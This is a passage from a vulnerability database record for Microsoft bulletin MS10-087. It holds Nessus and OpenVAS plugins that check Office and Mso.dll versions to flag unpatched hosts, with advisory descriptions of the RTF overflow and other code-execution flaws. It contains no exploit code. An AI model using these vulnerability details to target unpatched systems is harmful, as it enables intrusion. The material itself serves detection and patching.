script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Office for Mac 2011,\nOffice 2008 for Mac, and Open XML File Format Converter for Mac.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office:2008::mac\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office:2011::mac\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:open_xml_file_format_converter:::mac\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/MacOSX/packages\", \"Host/uname\");\n\n exit(0);\n}\n\n\ninclude(\"misc_func.inc\");\ninclude(\"ssh_func.inc\");\ninclude(\"macosx_func.inc\");\n\n\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS)\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nfunction exec(cmd)\n{\n local_var buf, ret;\n\n if (islocalhost())\n buf = pread(cmd:\"/bin/bash\", argv:make_list(\"bash\", \"-c\", cmd));\n else\n {\n ret = ssh_open_connection();\n if (!ret) exit(1, \"ssh_open_connection() failed.\");\n buf = ssh_cmd(cmd:cmd);\n ssh_close_connection();\n }\n return buf;\n}\n\n\npackages = get_kb_item(\"Host/MacOSX/packages\");\nif (!packages) exit(1, \"The 'Host/MacOSX/packages' KB item is missing.\");\n\nuname = get_kb_item(\"Host/uname\");\nif (!uname) exit(1, \"The 'Host/uname' KB item is missing.\");\nif (!egrep(pattern:\"Darwin.*\", string:uname)) exit(1, \"The host does not appear to be using the Darwin sub-system.\");\n\n\n# Gather version info.\ninfo = '';\ninstalls = make_array();\n\nprod = 'Office for Mac 2011';\nplist = \"/Applications/Microsoft Office 2011/Office/MicrosoftComponentPlugin.framework/Versions/14/Resources/Info.plist\";\ncmd = 'cat \\'' + plist + '\\' | ' +\n 'grep -A 1 CFBundleShortVersionString | ' +\n 'tail -n 1 | ' +\n 'sed \\'s/.*string>\\\\(.*\\\\)<\\\\/string>.*/\\\\1/g\\'';\nversion = exec(cmd:cmd);\nif (version && version =~ \"^[0-9]+\\.\")\n{\n version = chomp(version);\n if (version !~ \"^14\\.\") exit(1, \"Failed to get the version for \"+prod+\" - '\"+version+\"'.\");\n\n installs[prod] = version;\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n fixed_version = '14.0.1';\n fix = split(fixed_version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(fix); i++)\n fix[i] = int(fix[i]);\n\n for (i=0; i<max_index(fix); i++)\n if ((ver[i] < fix[i]))\n {\n info +=\n '\\n Product : ' + prod +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n break;\n }\n else if (ver[i] > fix[i])\n break;\n}\n\nprod = 'Office 2008 for Mac';\nplist = \"/Applications/Microsoft Office 2008/Office/MicrosoftComponentPlugin.framework/Versions/12/Resources/Info.plist\";\ncmd = 'cat \\'' + plist + '\\' | ' +\n 'grep -A 1 CFBundleShortVersionString | ' +\n 'tail -n 1 | ' +\n 'sed \\'s/.*string>\\\\(.*\\\\)<\\\\/string>.*/\\\\1/g\\'';\nversion = exec(cmd:cmd);\nif (version && version =~ \"^[0-9]+\\.\")\n{\n version = chomp(version);\n if (version !~ \"^12\\.\") exit(1, \"Failed to get the version for \"+prod+\" - '\"+version+\"'.\");\n\n installs[prod] = version;\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n fixed_version = '12.2.8';\n fix = split(fixed_version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(fix); i++)\n fix[i] = int(fix[i]);\n\n for (i=0; i<max_index(fix); i++)\n if ((ver[i] < fix[i]))\n {\n info +=\n '\\n Product : ' + prod +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n break;\n }\n else if (ver[i] > fix[i])\n break;\n}\n\nprod = 'Open XML File Format Converter for Mac';\nplist = \"/Applications/Open XML Converter.app/Contents/Info.plist\";\ncmd = 'cat \\'' + plist + '\\' | ' +\n 'grep -A 1 CFBundleShortVersionString | ' +\n 'tail -n 1 | ' +\n 'sed \\'s/.*string>\\\\(.*\\\\)<\\\\/string>.*/\\\\1/g\\'';\nversion = exec(cmd:cmd);\nif (version && version =~ \"^[0-9]+\\.\")\n{\n version = chomp(version);\n installs[prod] = version;\n\n ver = split(version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(ver); i++)\n ver[i] = int(ver[i]);\n\n fixed_version = '1.1.8';\n fix = split(fixed_version, sep:'.', keep:FALSE);\n for (i=0; i<max_index(fix); i++)\n fix[i] = int(fix[i]);\n\n for (i=0; i<max_index(fix); i++)\n if ((ver[i] < fix[i]))\n {\n info +=\n '\\n Product : ' + prod +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version + '\\n';\n break;\n }\n else if (ver[i] > fix[i])\n break;\n}\n\n\n# Report findings.\nif (info)\n{\n gs_opt = get_kb_item(\"global_settings/report_verbosity\");\n if (gs_opt && gs_opt != 'Quiet') security_hole(port:0, extra:info);\n else security_hole(0);\n\n exit(0);\n}\nelse\n{\n if (max_index(keys(installs)) == 0) exit(0, \"Office for Mac / Open XML File Format Converter is not installed.\");\n else\n {\n msg = 'The host has ';\n foreach prod (sort(keys(installs)))\n msg += prod + ' ' + installs[prod] + ' and ';\n msg = substr(msg, 0, strlen(msg)-1-strlen(' and '));\n\n msg += ' installed and thus is not affected.';\n\n exit(0, msg);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:43:31", "description": "The remote Windows host is running a version of Microsoft Office that\nis affected by several vulnerabilities :\n\n - An integer underflow exists in the way the application\n parses the PowerPoint file format, which could lead to\n heap corruption and allow for arbitrary code execution\n when opening a specially crafted PowerPoint file.\n (CVE-2010-2573)\n\n - A stack-based buffer overflow can be triggered when\n parsing specially crafted RTF files, leading to\n arbitrary code execution. (CVE-2010-3333)\n\n - A memory corruption vulnerability exists in the way\n the application parses specially crafted Office files\n containing Office Art Drawing records. (CVE-2010-3334)\n\n - A memory corruption vulnerability exists in the way\n drawing exceptions are handled when opening specially\n crafted Office files. (CVE-2010-3335)\n\n - A memory corruption vulnerability exists in the way\n the application parses specially crafted Office files.\n (CVE-2010-3336)\n\n - A DLL preloading (aka binary planting) vulnerability\n exists because the application insecurely looks in\n its current working directory when resolving DLL\n dependencies. (CVE-2010-3337)", "edition": 26, "published": "2010-11-09T00:00:00", "title": "MS10-087: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2423930)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3336", "CVE-2010-3337", "CVE-2010-3334", "CVE-2010-3335", "CVE-2010-3333", "CVE-2010-2573"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:microsoft:office"], "id": "SMB_NT_MS10-087.NASL", "href": "https://www.tenable.com/plugins/nessus/50528", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(50528);\n script_version(\"1.33\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\n \"CVE-2010-2573\",\n \"CVE-2010-3333\",\n \"CVE-2010-3334\",\n \"CVE-2010-3335\",\n \"CVE-2010-3336\",\n \"CVE-2010-3337\"\n );\n script_bugtraq_id(\n 42628,\n 44628,\n 44652,\n 44656,\n 44659,\n 44660\n );\n script_xref(name:\"EDB-ID\", value:\"17474\");\n script_xref(name:\"MSFT\", value:\"MS10-087\");\n script_xref(name:\"MSKB\", value:\"2289158\");\n script_xref(name:\"MSKB\", value:\"2289161\");\n script_xref(name:\"MSKB\", value:\"2289169\");\n script_xref(name:\"MSKB\", value:\"2289187\");\n\n script_name(english:\"MS10-087: Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (2423930)\");\n script_summary(english:\"Checks version of mso.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host through Microsoft\nOffice.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is running a version of Microsoft Office that\nis affected by several vulnerabilities :\n\n - An integer underflow exists in the way the application\n parses the PowerPoint file format, which could lead to\n heap corruption and allow for arbitrary code execution\n when opening a specially crafted PowerPoint file.\n (CVE-2010-2573)\n\n - A stack-based buffer overflow can be triggered when\n parsing specially crafted RTF files, leading to\n arbitrary code execution. (CVE-2010-3333)\n\n - A memory corruption vulnerability exists in the way\n the application parses specially crafted Office files\n containing Office Art Drawing records. (CVE-2010-3334)\n\n - A memory corruption vulnerability exists in the way\n drawing exceptions are handled when opening specially\n crafted Office files. (CVE-2010-3335)\n\n - A memory corruption vulnerability exists in the way\n the application parses specially crafted Office files.\n (CVE-2010-3336)\n\n - A DLL preloading (aka binary planting) vulnerability\n exists because the application insecurely looks in\n its current working directory when resolving DLL\n dependencies. (CVE-2010-3337)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-087\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Office XP, 2003, 2007, and\n2010.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:office\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_nt_ms02-031.nasl\", \"office_installed.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS10-087';\nkbs = make_list(\"2289158\", \"2289161\", \"2289169\", \"2289187\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\narch = get_kb_item_or_exit(\"SMB/ARCH\");\noffice_vers = hotfix_check_office_version();\nif (!is_accessible_share()) exit(1, \"is_accessible_share() failed.\");\nvuln = FALSE;\n\nx86_path = hotfix_get_commonfilesdir();\nif (!x86_path) audit(AUDIT_PATH_NOT_DETERMINED, 'Common Files');\nx64_path = hotfix_get_programfilesdirx86();\nif (arch == 'x64' && !x64_path) audit(AUDIT_PATH_NOT_DETERMINED, 'Program Files (x86)');\n\n# Office 2010\nif (office_vers[\"14.0\"])\n{\n if (\n hotfix_is_vulnerable(file:\"Mso.dll\", version:\"14.0.5128.5000\", min_version:'14.0.0.0', path:x86_path+\"\\Microsoft Shared\\Office14\", bulletin:bulletin, kb:\"2289161\") ||\n hotfix_is_vulnerable(file:\"Mso.dll\", arch:\"x64\", version:\"14.0.5128.5000\", min_version:'14.0.0.0', path:x64_path+\"\\Common Files\\Microsoft Shared\\Office14\", bulletin:bulletin, kb:\"2289161\")\n ) vuln = TRUE;\n}\n# Office 2007\nif (office_vers[\"12.0\"])\n{\n sp = get_kb_item(\"SMB/Office/2007/SP\");\n if (!isnull(sp) && sp == 2)\n {\n if (\n hotfix_is_vulnerable(file:\"Mso.dll\", version:\"12.0.6545.5004\", min_version:'12.0.0.0', path:x86_path+\"\\Microsoft Shared\\Office12\", bulletin:bulletin, kb:\"2289158\") ||\n hotfix_is_vulnerable(file:\"Mso.dll\", arch:\"x64\", version:\"12.0.6545.5004\", min_version:'12.0.0.0', path:x64_path+\"\\Common Files\\Microsoft Shared\\Office12\", bulletin:bulletin, kb:\"2289158\")\n ) vuln = TRUE;\n }\n}\n# Office 2003\nif (office_vers[\"11.0\"])\n{\n sp = get_kb_item(\"SMB/Office/2003/SP\");\n if (!isnull(sp) && sp == 3)\n {\n if (\n hotfix_is_vulnerable(file:\"Mso.dll\", version:\"11.0.8329.0\", min_version:'11.0.0.0', path:x86_path+\"\\Microsoft Shared\\Office11\", bulletin:bulletin, kb:\"2289187\") ||\n hotfix_is_vulnerable(file:\"Mso.dll\", arch:\"x64\", version:\"11.0.8329.0\", min_version:'11.0.0.0', path:x64_path+\"\\Common Files\\Microsoft Shared\\Office11\", bulletin:bulletin, kb:\"2289187\")\n ) vuln = TRUE;\n }\n}\n# Office XP\nif (office_vers[\"10.0\"])\n{\n sp = get_kb_item(\"SMB/Office/XP/SP\");\n if (!isnull(sp) && sp == 3)\n {\n if (\n hotfix_is_vulnerable(file:\"Mso.dll\", version:\"10.0.6867.0\", path:x86_path+\"\\Microsoft Shared\\Office10\", bulletin:bulletin, kb:\"2289169\") ||\n hotfix_is_vulnerable(file:\"Mso.dll\", arch:\"x64\", version:\"10.0.6867.0\", path:x64_path+\"\\Common Files\\Microsoft Shared\\Office10\", bulletin:bulletin, kb:\"2289169\")\n ) vuln = TRUE;\n }\n}\n\nif (vuln)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-10-30T10:45:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3336", "CVE-2010-3337", "CVE-2010-3334", "CVE-2010-3335", "CVE-2010-3333"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-087.", "modified": "2017-10-26T00:00:00", "published": "2010-11-10T00:00:00", "id": "OPENVAS:901166", "href": "http://plugins.openvas.org/nasl.php?oid=901166", "type": "openvas", "title": "Microsoft Office Remote Code Execution Vulnerabilities (2423930)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms10-087.nasl 7585 2017-10-26 15:03:01Z cfischer $\n#\n# Microsoft Office Remote Code Execution Vulnerabilities (2423930)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow attackers to execute arbitrary code.\n Impact Level: System\";\ntag_affected = \"Microsoft Office XP Service Pack 3\n Microsoft Office 2003 Service Pack 3\n Microsoft Office 2007 Service Pack 2\n Microsoft Office 2010.\";\ntag_insight = \"Multiple flaws are caused by,\n - a stack overflow error when processing malformed Rich Text Format data.\n - a memory corruption error when processing Office Art Drawing records in\n Office files.\n - a memory corruption error when handling drawing exceptions.\n - a memory corruption error when handling SPID data in Office documents.\n - an error when loading certain librairies from the current working directory.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/bulletin/MS10-087.mspx\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS10-087.\";\n\nif(description)\n{\n script_id(901166);\n script_version(\"$Revision: 7585 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-10-26 17:03:01 +0200 (Thu, 26 Oct 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-11-10 14:58:25 +0100 (Wed, 10 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-3333\", \"CVE-2010-3334\", \"CVE-2010-3335\",\n \"CVE-2010-3336\", \"CVE-2010-3337\");\n script_bugtraq_id(44652, 44656, 44659, 44660, 42628);\n script_name(\"Microsoft Office Remote Code Execution Vulnerabilities (2423930)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/38521\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/2923\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/bulletin/MS10-087.mspx\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Get File Version\nfunction FileVer (file, path)\n{\n share = ereg_replace(pattern:\"([A-Za-z]):.*\", replace:\"\\1$\", string:path);\n if(share =~ \"[a-z]\\$\")\n share = toupper(share);\n file = ereg_replace(pattern:\"[A-Za-z]:(.*)\", replace:\"\\1\", string:path + file);\n ver = GetVer(file:file, share:share);\n return ver;\n}\n\n## MS Office XP, 2003, 2007, 2010\nif(get_kb_item(\"MS/Office/Ver\") =~ \"^[10|11|12|14].*\")\n{\n ## Get Office File Path\n path = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\",\n item:\"CommonFilesDir\");\n if(! path) {\n exit(0);\n }\n\n foreach ver (make_list(\"OFFICE10\", \"OFFICE11\", \"OFFICE12\", \"OFFICE14\"))\n {\n offPath = path + \"\\Microsoft Shared\\\" + ver;\n dllVer = FileVer(file:\"\\Mso.dll\", path:offPath);\n if(dllVer)\n {\n ## Grep for Mso.dll versions\n if(version_in_range(version:dllVer, test_version:\"10.0\", test_version2:\"10.0.6866.9\") ||\n version_in_range(version:dllVer, test_version:\"11.0\", test_version2:\"11.0.8328.9\") ||\n version_in_range(version:dllVer, test_version:\"12.0\", test_version2:\"12.0.6545.5003\")||\n version_in_range(version:dllVer, test_version:\"14.0\", test_version2:\"14.0.5128.4999\"))\n {\n security_message(0);\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-08T14:05:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3336", "CVE-2010-3337", "CVE-2010-3334", "CVE-2010-3335", "CVE-2010-3333"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-087.", "modified": "2020-01-07T00:00:00", "published": "2010-11-10T00:00:00", "id": "OPENVAS:1361412562310901166", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310901166", "type": "openvas", "title": "Microsoft Office Remote Code Execution Vulnerabilities (2423930)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Office Remote Code Execution Vulnerabilities (2423930)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.901166\");\n script_version(\"2020-01-07T09:06:32+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-07 09:06:32 +0000 (Tue, 07 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-11-10 14:58:25 +0100 (Wed, 10 Nov 2010)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-3333\", \"CVE-2010-3334\", \"CVE-2010-3335\",\n \"CVE-2010-3336\", \"CVE-2010-3337\");\n script_bugtraq_id(44652, 44656, 44659, 44660, 42628);\n script_name(\"Microsoft Office Remote Code Execution Vulnerabilities (2423930)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"MS/Office/Ver\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow attackers to execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Office XP Service Pack 3\n\n - Microsoft Office 2003 Service Pack 3\n\n - Microsoft Office 2007 Service Pack 2\n\n - Microsoft Office 2010\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are caused by,\n\n - a stack overflow error when processing malformed Rich Text Format data.\n\n - a memory corruption error when processing Office Art Drawing records in\n Office files.\n\n - a memory corruption error when handling drawing exceptions.\n\n - a memory corruption error when handling SPID data in Office documents.\n\n - an error when loading certain libraries from the current working directory.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS10-087.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/2923\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-087\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nfunction FileVer (file, path)\n{\n share = ereg_replace(pattern:\"([A-Za-z]):.*\", replace:\"\\1$\", string:path);\n if(share =~ \"[a-z]\\$\")\n share = toupper(share);\n file = ereg_replace(pattern:\"[A-Za-z]:(.*)\", replace:\"\\1\", string:path + file);\n ver = GetVer(file:file, share:share);\n return ver;\n}\n\nofficeVer = get_kb_item(\"MS/Office/Ver\");\n\n## MS Office XP, 2003, 2007, 2010\nif(officeVer && officeVer =~ \"^1[0124]\\.\")\n{\n path = registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\", item:\"CommonFilesDir\");\n if(! path) {\n exit(0);\n }\n\n foreach ver (make_list(\"OFFICE10\", \"OFFICE11\", \"OFFICE12\", \"OFFICE14\"))\n {\n offPath = path + \"\\Microsoft Shared\\\" + ver;\n dllVer = FileVer(file:\"\\Mso.dll\", path:offPath);\n if(dllVer)\n {\n if(version_in_range(version:dllVer, test_version:\"10.0\", test_version2:\"10.0.6866.9\") ||\n version_in_range(version:dllVer, test_version:\"11.0\", test_version2:\"11.0.8328.9\") ||\n version_in_range(version:dllVer, test_version:\"12.0\", test_version2:\"12.0.6545.5003\")||\n version_in_range(version:dllVer, test_version:\"14.0\", test_version2:\"14.0.5128.4999\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:52:51", "bulletinFamily": "microsoft", "cvelist": ["CVE-2010-3336", "CVE-2010-3337", "CVE-2010-3334", "CVE-2010-3335", "CVE-2010-3333", "CVE-2010-2573"], "description": "<html><body><p>Description of the vulnerabilities in Microsoft Office could allow remote code execution.</p><h2>INTRODUCTION</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS10-087. To view the complete security bulletin, visit one of the following Microsoft websites: <ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/updates/bulletins/201011.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/security/updates/bulletins/201011.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now:<br/><div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate/\" id=\"kb-link-2\" target=\"_self\">http://update.microsoft.com/microsoftupdate/</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/technet/security/bulletin/ms10-087.mspx\" id=\"kb-link-3\" target=\"_self\">http://www.microsoft.com/technet/security/bulletin/ms10-087.mspx</a></div></li></ul><span><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3> <br/>Help installing updates: <br/><a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-4\" target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <br/><a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-5\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your computer that is running Windows from viruses and malware:<br/><a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-6\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <br/><a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-7\" target=\"_self\">International Support</a><br/><br/></span></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Additional information about this security update</h3> <br/><br/> <br/>For more information about this security update and for information about any known issues with specific releases of this software, click the following article numbers to view the articles in the Microsoft Knowledge Base: <br/><br/><br/><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/2289161\" id=\"kb-link-8\">2289161 </a> MS10-087: Description of the security update for Office 2010: November 9, 2010</li><li><a href=\"https://support.microsoft.com/en-us/help/2289158\" id=\"kb-link-9\">2289158 </a> MS10-087: Description of the security update for 2007 Office System: November 9, 2010 </li><li><a href=\"https://support.microsoft.com/en-us/help/2289187\" id=\"kb-link-10\">2289187 </a> MS10-087: Description of the security update for Office 2003: November 9, 2010 <br/><br/><div class=\"indent\"><span class=\"text-base\">Known issues in security update 2289187:\u00a0</span></div><div class=\"indent\">After you install this security update, you may not be able to view or insert certain image files into Microsoft Office documents. For more information about this issue, click the following article number to view the article in the Microsoft Knowledge Base:\u00a0</div><div class=\"indent\"><a href=\"https://support.microsoft.com/en-us/help/2479871\" id=\"kb-link-11\">2479871 </a> Security settings for graphic filters for Microsoft Office 2010, the 2007 Microsoft Office system, Microsoft Office 2003, and Microsoft Office XP</div></li><li><a href=\"https://support.microsoft.com/en-us/help/2289169\" id=\"kb-link-12\">2289169 </a> MS10-087: Description of the security update for Office XP: November 9, 2010 <br/><br/><div class=\"indent\"><span 